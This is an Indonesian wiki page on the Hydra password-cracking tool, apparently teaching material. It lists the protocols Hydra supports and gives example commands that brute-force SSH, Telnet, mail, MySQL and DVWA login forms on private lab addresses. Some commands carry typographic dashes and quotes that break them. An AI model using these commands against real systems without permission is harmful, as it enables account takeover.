Hydra

From OnnoWiki
Revision as of 05:41, 19 February 2020 by Onnowpurbo (talk | contribs)
Jump to navigation Jump to search

Hydra adalah network log yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.


System yang di serang 

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird,
FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD,
HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3,
POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Contoh

hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
hydra -L userlist.txt -P passwordlist.txt ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f telnet://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f pop3://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f imap://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f 192.168.0.80 mysql

hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 mysql
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 telnet
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh

Untuk DVWA (HTTP-POST-FORM)

hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”

hydra 192.168.0.108 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-post-form "/DVWA-1.9/login.php:username=admin&password=^PASS^&Login=Login:Login failed"

hydra -l admin -p password 192.168.0.102 http-get-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed"

hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form

hydra –L userlist.txt –P passwordlist.txt –e ns –t 32 –u –f –m /DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login 192.168.0.102 http-post-form

hydra -L dvwauser.txt -P dvwapass.txt 192.168.0.102 http-post-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"


Referensi

General usage and options

HTTP basic auth

HTTP form based auth

Multiple protocols

Telnet

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=Hydra&oldid=59942"